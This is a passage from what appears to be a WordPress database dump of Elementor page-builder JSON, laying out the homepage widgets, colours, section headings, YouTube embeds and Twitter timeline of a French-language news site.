\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2400,769,'_elementor_version','0.4'),(2402,770,'_elementor_edit_mode','builder'),(2403,770,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"of